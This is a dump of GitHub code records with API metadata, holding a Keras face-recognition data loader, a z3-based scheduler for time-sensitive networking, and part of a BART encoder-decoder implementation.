"line_number": 11, "usage_type": "name"}, {"api_name": "pynput.mouse.Button.middle", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pynput.mouse.Button", "line_number": 12, "usage_type": "name"}, {"api_name": "pynput.mouse.Button.right", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pynput.mouse.Button", "line_number": 13, "usage_type": "name"}, {"api_name": "pynput.keyboard.KeyCode", "line_number": 17, "usage_type": "call"}, {"api_name": "pynput.keyboard", "line_number": 17, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 18, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 19, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 20, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 21, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 22, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 23, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 24, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 25, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 26, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 27, "usage_type": "name"}, {"api_name": "pynput.keyboard.KeyCode", "line_number": 28, "usage_type": "call"}, {"api_name": "pynput.keyboard", "line_number": 28, "usage_type": "name"}, {"api_name": "pynput.mouse.Button.left", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pynput.mouse.Button", "line_number": 34, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 35, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 36, "usage_type": "name"}, {"api_name": "pynput.keyboard.KeyCode", "line_number": 37, "usage_type": "call"}, {"api_name": "pynput.keyboard.Key", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 38, "usage_type": "name"}, {"api_name": "tkinter.Frame", "line_number": 47, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 50, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 53, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 56, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 59, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 62, "usage_type": "call"}, {"api_name": "tkinter.ttk.Label", "line_number": 65, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 65, "usage_type": 
"name"}, {"api_name": "tkinter.ttk.Label", "line_number": 69, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 69, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 73, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 73, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 77, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 77, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 80, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 80, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 83, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 83, "usage_type": "name"}, {"api_name": "tkinter.StringVar", "line_number": 86, "usage_type": "call"}, {"api_name": "tkinter.Entry", "line_number": 88, "usage_type": "call"}, {"api_name": "tkinter.StringVar", "line_number": 91, "usage_type": "call"}, {"api_name": "tkinter.Entry", "line_number": 93, "usage_type": "call"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 96, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 96, "usage_type": "name"}, {"api_name": "tkinter.StringVar", "line_number": 97, "usage_type": "call"}, {"api_name": "pynput.mouse.Button.left", "line_number": 99, "usage_type": "attribute"}, {"api_name": "pynput.mouse.Button", "line_number": 99, "usage_type": "name"}, {"api_name": "pynput.mouse.Button.middle", "line_number": 99, "usage_type": "attribute"}, {"api_name": "pynput.mouse.Button.right", "line_number": 99, "usage_type": "attribute"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 103, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 103, "usage_type": "name"}, {"api_name": "tkinter.StringVar", "line_number": 104, "usage_type": "call"}, {"api_name": "pynput.keyboard.Key", "line_number": 105, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 105, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 106, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 106, "usage_type": "name"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 110, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 110, "usage_type": "name"}, {"api_name": "tkinter.StringVar", "line_number": 111, "usage_type": "call"}, {"api_name": "pynput.keyboard.Key", "line_number": 112, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 112, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 113, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 113, "usage_type": "name"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 117, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 117, "usage_type": "name"}, {"api_name": "tkinter.StringVar", "line_number": 118, "usage_type": "call"}, {"api_name": "pynput.keyboard.Key", "line_number": 119, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 119, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 120, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 120, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 136, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 136, "usage_type": "name"}, {"api_name": "pynput.mouse.Controller", "line_number": 139, "usage_type": "call"}, {"api_name": "pynput.keyboard.Listener", "line_number": 141, "usage_type": 
"call"}, {"api_name": "pynput.keyboard", "line_number": 141, "usage_type": "name"}, {"api_name": "tkinter.Tk", "line_number": 231, "usage_type": "call"}]} +{"seq_id": "4641233439", "text": "\nimport numpy as np\n\nimport tensorflow as tf\n\nimport keras\n\ntraining_dir = \"./clean_data\"\ntesting_dir = \"./test\"\nbatch_size = 400\n\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom random import randint\nfrom collections import Counter\n\n\ndef data(num_of_images=40,width=105,height=105):\n\n train_datagen = ImageDataGenerator(rescale=1./255,shear_range=0.2, zoom_range=0.2,horizontal_flip=True)\n\n train_generator = train_datagen.flow_from_directory(training_dir, target_size=(width,height),batch_size=batch_size, class_mode='binary',shuffle=False)\n\n train = train_generator.next()\n\n train_x,train_y = train[0],train[1]\n \n if(num_of_images>batch_size):\n exit()\n\n train_left_input = np.zeros((num_of_images//2,width,height,3))\n train_right_input = np.zeros((num_of_images//2,width,height,3))\n train_output = np.zeros(num_of_images//2,)\n \n for i in range(num_of_images//2):\n train_left_input[i] = train_x[(((i%40)*10)+randint(0,9))%400]\n \n if randint(0,1):\n train_right_input[i] = train_x[(((i%40)*10)+20)%400]\n train_output[i] = 0\n else:\n train_right_input[i] = train_x[(((i%40)*10)+randint(0,9))%400]\n train_output[i] = 1\n\n print(Counter(train_output))\n return train_left_input,train_right_input,train_output\n\nfrom collections import Counter\n", "repo_name": "aniketbiprojit/face-recognition-one-shot-keras-old", "sub_path": "load_data.py", "file_name": "load_data.py", "file_ext": "py", "file_size_in_byte": 1389, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 32, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 35, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 37, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 41, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 44, "usage_type": "call"}]} +{"seq_id": "7622025065", "text": "\"\"\"\nAuthor: Chuanyu (skewcy@gmail.com)\nsmt_wa.py (c) 2023\nDesc: description\nCreated: 2023-10-11T01:17:57.050Z\n\"\"\"\n\nfrom typing import Dict\nfrom .. 
import utils\nimport z3 # type: ignore\n\nVarDict = Dict[utils.Stream, Dict[utils.Link, Dict[str, z3.ArithRef]]]\n\n\ndef benchmark(\n name, task_path, net_path, output_path=\"./\", workers=1\n) -> utils.Statistics:\n stat = utils.Statistics(name) ## Init empty stat\n try:\n ## Change _Method to your method class\n test = smt_wa(workers) # type: ignore\n test.init(task_path, net_path)\n test.prepare()\n stat = test.solve() ## Update stat\n if stat.result == utils.Result.schedulable:\n test.output().to_csv(name, output_path)\n stat.content(name=name)\n return stat\n except KeyboardInterrupt:\n stat.content(name=name)\n return stat\n except Exception as e:\n print(\"[!]\", e, flush=True)\n stat.result = utils.Result.error\n stat.content(name=name)\n return stat\n\n\nclass smt_wa:\n def __init__(self, workers=1) -> None:\n self.workers = workers\n\n def init(self, task_path, net_path) -> None:\n self.task = utils.load_stream(task_path)\n self.net = utils.load_network(net_path)\n self.task.set_routings(\n {s: self.net.get_shortest_path(s.src, s.dst) for s in self.task.streams}\n )\n\n z3.set_param(\"parallel.enable\", True)\n z3.set_param(\"parallel.threads.max\", self.workers)\n self.solver = z3.Solver()\n self.task_vars = self.create_task_vars(self.task)\n\n def prepare(self) -> None:\n self.add_frame_const(self.solver, self.task_vars)\n self.add_flow_trans_const(self.solver, self.task_vars)\n self.add_delay_const(self.solver, self.task_vars)\n self.add_link_const(self.solver, self.task_vars, self.net, self.task)\n self.add_queue_range_const(self.solver, self.task_vars)\n self.add_frame_isolation_const(self.solver, self.task_vars, self.task)\n\n @utils.check_time_limit\n def solve(self) -> utils.Statistics:\n self.solver.set(\"timeout\", int(utils.T_LIMIT - utils.time_log()) * 1000)\n result = self.solver.check() ## Z3 solving\n\n info = self.solver.statistics()\n algo_time = info.time\n algo_mem = info.max_memory\n algo_result = (\n utils.Result.schedulable if result == z3.sat else utils.Result.unschedulable\n )\n\n self.model_output = self.solver.model()\n return utils.Statistics(\"-\", algo_result, algo_time, algo_mem)\n\n def output(self) -> utils.Config:\n config = utils.Config()\n config.gcl = self.get_gcl_list(self.model_output, self.task_vars, self.task.lcm)\n config.release = self.get_release_time(self.model_output, self.task_vars)\n config.queue = self.get_queue_assignment(self.model_output, self.task_vars)\n config.route = self.get_route(self.task_vars)\n config._delay = self.get_delay(self.model_output, self.task_vars)\n return config\n\n @staticmethod\n def create_task_vars(tasks: utils.StreamSet) -> VarDict:\n task_var: VarDict = {}\n for s in tasks:\n task_var.setdefault(s, {})\n for l in s.routing_path.links:\n task_var[s].setdefault(l, {})\n task_var[s][l][\"phi\"] = z3.Int(\"phi_\" + str(s) + \"_\" + str(l))\n task_var[s][l][\"p\"] = z3.Int(\"p_\" + str(s) + \"_\" + str(l))\n return task_var\n\n @staticmethod\n def add_frame_const(solver: z3.Solver, var: VarDict) -> None:\n for s in var.keys():\n for l in var[s].keys():\n solver.add(\n var[s][l][\"phi\"] >= 0, var[s][l][\"phi\"] <= s.period - s.t_trans\n )\n\n @staticmethod\n def add_flow_trans_const(solver: z3.Solver, var: VarDict) -> None:\n for s in var.keys():\n for l in var[s].keys():\n next_hop = s.routing_path.get_next_link(l)\n if next_hop is None:\n continue\n solver.add(\n var[s][l][\"phi\"] + s.t_trans + next_hop.t_proc + next_hop.t_sync\n <= var[s][next_hop][\"phi\"]\n )\n\n @staticmethod\n def 
add_delay_const(solver: z3.Solver, var: VarDict) -> None:\n for s in var.keys():\n solver.add(\n var[s][s.first_link][\"phi\"] + s.deadline\n >= var[s][s.last_link][\"phi\"] + s.t_trans + s.last_link.t_sync\n )\n\n @staticmethod\n def add_link_const(\n solver: z3.Solver, var: VarDict, net: utils.Network, task: utils.StreamSet\n ) -> None:\n for l in net.links:\n for s1, s2 in task.get_pairs_on_link(l):\n for f1, f2 in task.get_frame_index_pairs(s1, s2):\n solver.add(\n z3.Or(\n var[s1][l][\"phi\"] + f1 * s1.period\n >= var[s2][l][\"phi\"] + f2 * s2.period + s2.t_trans,\n var[s2][l][\"phi\"] + f2 * s2.period\n >= var[s1][l][\"phi\"] + f1 * s1.period + s1.t_trans,\n )\n )\n\n @staticmethod\n def add_queue_range_const(solver: z3.Solver, var: VarDict) -> None:\n for s in var.keys():\n for l in var[s].keys():\n solver.add(0 <= var[s][l][\"p\"])\n solver.add(var[s][l][\"p\"] < l.q_num)\n\n @staticmethod\n def add_frame_isolation_const(\n solver: z3.Solver, var: VarDict, task: utils.StreamSet\n ) -> None:\n for s1, s2 in task.get_pairs():\n for pl_1, pl_2, l in task.get_merged_links(s1, s2):\n for f1, f2 in task.get_frame_index_pairs(s1, s2):\n solver.add(\n z3.Or(\n var[s2][l][\"phi\"] + f2 * s2.period + l.t_sync\n <= var[s1][pl_1][\"phi\"] + f1 * s1.period + pl_1.t_proc,\n var[s1][l][\"phi\"] + f1 * s1.period + l.t_sync\n <= var[s2][pl_2][\"phi\"] + f2 * s2.period + pl_2.t_proc,\n var[s1][l][\"p\"] != var[s2][l][\"p\"],\n )\n )\n\n @staticmethod\n def get_gcl_list(result, var: VarDict, lcm: int) -> utils.GCL:\n gcl = []\n for s in var.keys():\n for l in var[s].keys():\n queue = result[var[s][l][\"p\"]].as_long()\n release = result[var[s][l][\"phi\"]].as_long()\n for k in s.get_frame_indexes(lcm):\n gcl.append(\n [\n l,\n queue,\n release + k * s.period,\n release + k * s.period + s.t_trans,\n lcm,\n ]\n )\n return utils.GCL(gcl)\n\n @staticmethod\n def get_release_time(result, var: VarDict) -> utils.Release:\n release = []\n for s in var.keys():\n release.append([s, 0, result[var[s][s.first_link][\"phi\"]].as_long()])\n return utils.Release(release)\n\n @staticmethod\n def get_queue_assignment(result, var) -> utils.Queue:\n queue = []\n for s in var.keys():\n for l in var[s].keys():\n queue.append([s, 0, l, result[var[s][l][\"p\"]].as_long()])\n return utils.Queue(queue)\n\n @staticmethod\n def get_route(var) -> utils.Route:\n route = []\n for s in var.keys():\n for l in var[s].keys():\n route.append([s, l])\n return utils.Route(route)\n\n @staticmethod\n def get_delay(result, var) -> utils.Delay:\n delay = []\n for s in var.keys():\n _delay = (\n result[var[s][s.last_link][\"phi\"]].as_long()\n - result[var[s][s.first_link][\"phi\"]].as_long()\n + s.t_trans\n )\n delay.append([s, 0, _delay])\n return utils.Delay(delay)\n\n\nif __name__ == \"__main__\":\n args = utils.parse_command_line_args()\n benchmark(args.name, args.task, args.net, args.output, args.workers)\n", "repo_name": "ChuanyuXue/tsnkit", "sub_path": "src/tsnkit/models/smt_wa.py", "file_name": "smt_wa.py", "file_ext": "py", "file_size_in_byte": 8187, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.Dict", "line_number": 12, "usage_type": "name"}, {"api_name": "z3.ArithRef", "line_number": 12, "usage_type": "attribute"}, {"api_name": "z3.set_param", "line_number": 50, "usage_type": "call"}, {"api_name": "z3.set_param", "line_number": 51, "usage_type": "call"}, {"api_name": "z3.Solver", "line_number": 52, "usage_type": "call"}, {"api_name": 
"z3.sat", "line_number": 72, "usage_type": "attribute"}, {"api_name": "z3.Int", "line_number": 94, "usage_type": "call"}, {"api_name": "z3.Int", "line_number": 95, "usage_type": "call"}, {"api_name": "z3.Solver", "line_number": 99, "usage_type": "attribute"}, {"api_name": "z3.Solver", "line_number": 107, "usage_type": "attribute"}, {"api_name": "z3.Solver", "line_number": 119, "usage_type": "attribute"}, {"api_name": "z3.Solver", "line_number": 128, "usage_type": "attribute"}, {"api_name": "z3.Or", "line_number": 134, "usage_type": "call"}, {"api_name": "z3.Solver", "line_number": 143, "usage_type": "attribute"}, {"api_name": "z3.Solver", "line_number": 151, "usage_type": "attribute"}, {"api_name": "z3.Or", "line_number": 157, "usage_type": "call"}]} +{"seq_id": "44282383471", "text": "from typing import Any, Dict, Tuple, Union, Optional\nimport torch\nimport torch.nn as nn\nimport random\nimport math\nimport wandb\nfrom model_utils import saveCallBack, DualBaseModelOutput\nfrom transformers import (\n BartPretrainedModel,\n AutoTokenizer,\n AutoConfig,\n BartForConditionalGeneration,\n)\nfrom torch.nn import CrossEntropyLoss\nfrom transformers.models.bart.modeling_bart import (\n shift_tokens_right,\n BartConfig,\n BartEncoderLayer,\n BartPretrainedModel,\n _expand_mask,\n _make_causal_mask,\n BartLearnedPositionalEmbedding,\n BartDecoderLayer,\n)\nfrom transformers.modeling_outputs import (\n Seq2SeqLMOutput,\n BaseModelOutput,\n Seq2SeqModelOutput,\n BaseModelOutputWithPastAndCrossAttentions,\n)\nimport nltk\nfrom global_utils import get_rouge_score\nimport numpy as np\nfrom pytorch_lightning import LightningModule\nfrom transformers.optimization import AdamW, get_linear_schedule_with_warmup\nimport time\nimport logging\nimport os\n\nlogger = logging.getLogger(__name__)\n\n\nclass BartDecoder(BartPretrainedModel):\n \"\"\"\n Transformer decoder consisting of *config.decoder_layers* layers. 
Each layer is a :class:`BartDecoderLayer`\n\n    Args:\n        config: BartConfig\n        embed_tokens (nn.Embedding): output embedding\n    \"\"\"\n\n    def __init__(self, config: BartConfig, embed_tokens: Optional[nn.Embedding] = None):\n        super().__init__(config)\n        self.dropout = config.dropout\n        self.layerdrop = config.decoder_layerdrop\n        self.padding_idx = config.pad_token_id\n        self.max_target_positions = config.max_position_embeddings\n        self.embed_scale = math.sqrt(config.d_model) if config.scale_embedding else 1.0\n\n        if embed_tokens is not None:\n            self.embed_tokens = embed_tokens\n        else:\n            self.embed_tokens = nn.Embedding(\n                config.vocab_size, config.d_model, self.padding_idx\n            )\n\n        self.embed_positions = BartLearnedPositionalEmbedding(\n            config.max_position_embeddings,\n            config.d_model,\n        )\n        self.layers = nn.ModuleList(\n            [BartDecoderLayer(config) for _ in range(config.decoder_layers)]\n        )\n        self.layernorm_embedding = nn.LayerNorm(config.d_model)\n\n        self.init_weights()\n\n    def get_input_embeddings(self):\n        return self.embed_tokens\n\n    def set_input_embeddings(self, value):\n        self.embed_tokens = value\n\n    def _prepare_decoder_attention_mask(\n        self, attention_mask, input_shape, inputs_embeds, past_key_values_length\n    ):\n        # create causal mask\n        # [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]\n        combined_attention_mask = None\n        if input_shape[-1] > 1:\n            combined_attention_mask = _make_causal_mask(\n                input_shape,\n                inputs_embeds.dtype,\n                past_key_values_length=past_key_values_length,\n            ).to(self.device)\n\n        if attention_mask is not None:\n            # [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]\n            expanded_attn_mask = _expand_mask(\n                attention_mask, inputs_embeds.dtype, tgt_len=input_shape[-1]\n            )\n            combined_attention_mask = (\n                expanded_attn_mask\n                if combined_attention_mask is None\n                else expanded_attn_mask + combined_attention_mask\n            )\n\n        return combined_attention_mask\n\n    def forward(\n        self,\n        input_ids=None,\n        attention_mask=None,\n        encoder_hidden_states=None,\n        encoder_attention_mask=None,\n        head_mask=None,\n        cross_attn_head_mask=None,\n        past_key_values=None,\n        inputs_embeds=None,\n        use_cache=None,\n        output_attentions=None,\n        output_hidden_states=None,\n        return_dict=None,\n        **kwargs,  # the main modification\n    ):\n        r\"\"\"\n        Args:\n            input_ids (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`):\n                Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you\n                provide it.\n\n                Indices can be obtained using :class:`~transformers.BartTokenizer`. See\n                :meth:`transformers.PreTrainedTokenizer.encode` and :meth:`transformers.PreTrainedTokenizer.__call__`\n                for details.\n\n                `What are input IDs? <../glossary.html#input-ids>`__\n            attention_mask (:obj:`torch.Tensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):\n                Mask to avoid performing attention on padding token indices. Mask values selected in ``[0, 1]``:\n\n                - 1 for tokens that are **not masked**,\n                - 0 for tokens that are **masked**.\n\n                `What are attention masks? <../glossary.html#attention-mask>`__\n            encoder_hidden_states (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, encoder_sequence_length, hidden_size)`, `optional`):\n                Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention\n                of the decoder.\n            encoder_attention_mask (:obj:`torch.LongTensor` of shape :obj:`(batch_size, encoder_sequence_length)`, `optional`):\n                Mask to avoid performing cross-attention on padding tokens indices of encoder input_ids. 
Mask values\n selected in ``[0, 1]``:\n\n - 1 for tokens that are **not masked**,\n - 0 for tokens that are **masked**.\n\n `What are attention masks? <../glossary.html#attention-mask>`__\n head_mask (:obj:`torch.Tensor` of shape :obj:`(decoder_layers, decoder_attention_heads)`, `optional`):\n Mask to nullify selected heads of the attention modules. Mask values selected in ``[0, 1]``:\n\n - 1 indicates the head is **not masked**,\n - 0 indicates the head is **masked**.\n\n cross_attn_head_mask (:obj:`torch.Tensor` of shape :obj:`(decoder_layers, decoder_attention_heads)`, `optional`):\n Mask to nullify selected heads of the cross-attention modules in the decoder to avoid performing\n cross-attention on hidden heads. Mask values selected in ``[0, 1]``:\n\n - 1 indicates the head is **not masked**,\n - 0 indicates the head is **masked**.\n\n past_key_values (:obj:`tuple(tuple(torch.FloatTensor))`, `optional`, returned when ``use_cache=True`` is passed or when ``config.use_cache=True``):\n Tuple of :obj:`tuple(torch.FloatTensor)` of length :obj:`config.n_layers`, with each tuple having 2\n tensors of shape :obj:`(batch_size, num_heads, sequence_length, embed_size_per_head)`) and 2 additional\n tensors of shape :obj:`(batch_size, num_heads, encoder_sequence_length, embed_size_per_head)`.\n\n Contains pre-computed hidden-states (key and values in the self-attention blocks and in the\n cross-attention blocks) that can be used (see :obj:`past_key_values` input) to speed up sequential\n decoding.\n\n If :obj:`past_key_values` are used, the user can optionally input only the last\n :obj:`decoder_input_ids` (those that don't have their past key value states given to this model) of\n shape :obj:`(batch_size, 1)` instead of all :obj:`decoder_input_ids`` of shape :obj:`(batch_size,\n sequence_length)`.\n inputs_embeds (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`, `optional`):\n Optionally, instead of passing :obj:`input_ids` you can choose to directly pass an embedded\n representation. This is useful if you want more control over how to convert :obj:`input_ids` indices\n into associated vectors than the model's internal embedding lookup matrix.\n output_attentions (:obj:`bool`, `optional`):\n Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under\n returned tensors for more detail.\n output_hidden_states (:obj:`bool`, `optional`):\n Whether or not to return the hidden states of all layers. 
See ``hidden_states`` under returned tensors\n for more detail.\n return_dict (:obj:`bool`, `optional`):\n Whether or not to return a :class:`~transformers.file_utils.ModelOutput` instead of a plain tuple.\n \"\"\"\n output_attentions = (\n output_attentions\n if output_attentions is not None\n else self.config.output_attentions\n )\n output_hidden_states = (\n output_hidden_states\n if output_hidden_states is not None\n else self.config.output_hidden_states\n )\n use_cache = use_cache if use_cache is not None else self.config.use_cache\n return_dict = (\n return_dict if return_dict is not None else self.config.use_return_dict\n )\n\n # retrieve input_ids and inputs_embeds\n if input_ids is not None and inputs_embeds is not None:\n raise ValueError(\n \"You cannot specify both decoder_input_ids and decoder_inputs_embeds at the same time\"\n )\n elif input_ids is not None:\n input_shape = input_ids.size()\n input_ids = input_ids.view(-1, input_shape[-1])\n elif inputs_embeds is not None:\n input_shape = inputs_embeds.size()[:-1]\n else:\n raise ValueError(\n \"You have to specify either decoder_input_ids or decoder_inputs_embeds\"\n )\n\n # past_key_values_length\n past_key_values_length = (\n past_key_values[0][0].shape[2] if past_key_values is not None else 0\n )\n\n if inputs_embeds is None:\n inputs_embeds = self.embed_tokens(input_ids) * self.embed_scale\n\n attention_mask = self._prepare_decoder_attention_mask(\n attention_mask, input_shape, inputs_embeds, past_key_values_length\n )\n\n # expand encoder attention mask\n if encoder_hidden_states is not None and encoder_attention_mask is not None:\n # [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]\n encoder_attention_mask = _expand_mask(\n encoder_attention_mask, inputs_embeds.dtype, tgt_len=input_shape[-1]\n )\n\n # embed positions\n positions = self.embed_positions(input_shape, past_key_values_length)\n\n hidden_states = inputs_embeds + positions\n hidden_states = self.layernorm_embedding(hidden_states)\n\n hidden_states = nn.functional.dropout(\n hidden_states, p=self.dropout, training=self.training\n )\n\n # decoder layers\n all_hidden_states = () if output_hidden_states else None\n all_self_attns = () if output_attentions else None\n all_cross_attentions = (\n () if (output_attentions and encoder_hidden_states is not None) else None\n )\n next_decoder_cache = () if use_cache else None\n\n # check if head_mask/cross_attn_head_mask has a correct number of layers specified if desired\n for attn_mask, mask_name in zip(\n [head_mask, cross_attn_head_mask], [\"head_mask\", \"cross_attn_head_mask\"]\n ):\n if attn_mask is not None:\n assert attn_mask.size()[0] == (\n len(self.layers)\n ), f\"The `{mask_name}` should be specified for {len(self.layers)} layers, but it is for {head_mask.size()[0]}.\"\n for idx, decoder_layer in enumerate(self.layers):\n # add LayerDrop (see https://arxiv.org/abs/1909.11556 for description)\n if output_hidden_states:\n all_hidden_states += (hidden_states,)\n dropout_probability = random.uniform(0, 1)\n if self.training and (dropout_probability < self.layerdrop):\n continue\n\n past_key_value = (\n past_key_values[idx] if past_key_values is not None else None\n )\n\n if getattr(self.config, \"gradient_checkpointing\", False) and self.training:\n if use_cache:\n logger.warning(\n \"`use_cache=True` is incompatible with `config.gradient_checkpointing=True`. 
Setting \"\n \"`use_cache=False`...\"\n )\n use_cache = False\n\n def create_custom_forward(module):\n def custom_forward(*inputs):\n # None for past_key_value\n return module(*inputs, output_attentions, use_cache)\n\n return custom_forward\n\n layer_outputs = torch.utils.checkpoint.checkpoint(\n create_custom_forward(decoder_layer),\n hidden_states,\n attention_mask,\n encoder_hidden_states,\n encoder_attention_mask,\n head_mask[idx] if head_mask is not None else None,\n cross_attn_head_mask[idx]\n if cross_attn_head_mask is not None\n else None,\n None,\n )\n else:\n layer_outputs = decoder_layer(\n hidden_states,\n attention_mask=attention_mask,\n encoder_hidden_states=encoder_hidden_states,\n encoder_attention_mask=encoder_attention_mask,\n layer_head_mask=(head_mask[idx] if head_mask is not None else None),\n cross_attn_layer_head_mask=(\n cross_attn_head_mask[idx]\n if cross_attn_head_mask is not None\n else None\n ),\n past_key_value=past_key_value,\n output_attentions=output_attentions,\n use_cache=use_cache,\n )\n hidden_states = layer_outputs[0]\n\n if use_cache:\n next_decoder_cache += (layer_outputs[3 if output_attentions else 1],)\n\n if output_attentions:\n all_self_attns += (layer_outputs[1],)\n\n if encoder_hidden_states is not None:\n all_cross_attentions += (layer_outputs[2],)\n\n # add hidden states from the last decoder layer\n if output_hidden_states:\n all_hidden_states += (hidden_states,)\n\n next_cache = next_decoder_cache if use_cache else None\n if not return_dict:\n return tuple(\n v\n for v in [\n hidden_states,\n next_cache,\n all_hidden_states,\n all_self_attns,\n all_cross_attentions,\n ]\n if v is not None\n )\n return BaseModelOutputWithPastAndCrossAttentions(\n last_hidden_state=hidden_states,\n past_key_values=next_cache,\n hidden_states=all_hidden_states,\n attentions=all_self_attns,\n cross_attentions=all_cross_attentions,\n )\n\n\nclass BartEncoder(BartPretrainedModel):\n \"\"\"\n Transformer encoder consisting of *config.encoder_layers* self attention layers. Each layer is a\n :class:`BartEncoderLayer`.\n\n Args:\n config: BartConfig\n embed_tokens (nn.Embedding): output embedding\n \"\"\"\n\n def __init__(self, config: BartConfig, embed_tokens: Optional[nn.Embedding] = None):\n super().__init__(config)\n\n self.dropout = config.dropout\n self.layerdrop = config.encoder_layerdrop\n\n embed_dim = config.d_model\n self.padding_idx = config.pad_token_id\n self.max_source_positions = config.max_position_embeddings\n self.embed_scale = math.sqrt(embed_dim) if config.scale_embedding else 1.0\n\n if embed_tokens is not None:\n self.embed_tokens = embed_tokens\n else:\n self.embed_tokens = nn.Embedding(\n config.vocab_size, embed_dim, self.padding_idx\n )\n\n self.embed_positions = BartLearnedPositionalEmbedding(\n config.max_position_embeddings,\n embed_dim,\n )\n self.layers = nn.ModuleList(\n [BartEncoderLayer(config) for _ in range(config.encoder_layers)]\n )\n self.layernorm_embedding = nn.LayerNorm(embed_dim)\n\n self.init_weights()\n\n def forward(\n self,\n input_ids=None,\n attention_mask=None,\n head_mask=None,\n inputs_embeds=None,\n output_attentions=None,\n output_hidden_states=None,\n return_dict=None,\n **kwargs,\n ):\n r\"\"\"\n Args:\n input_ids (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`):\n Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you\n provide it.\n\n Indices can be obtained using :class:`~transformers.BartTokenizer`. 
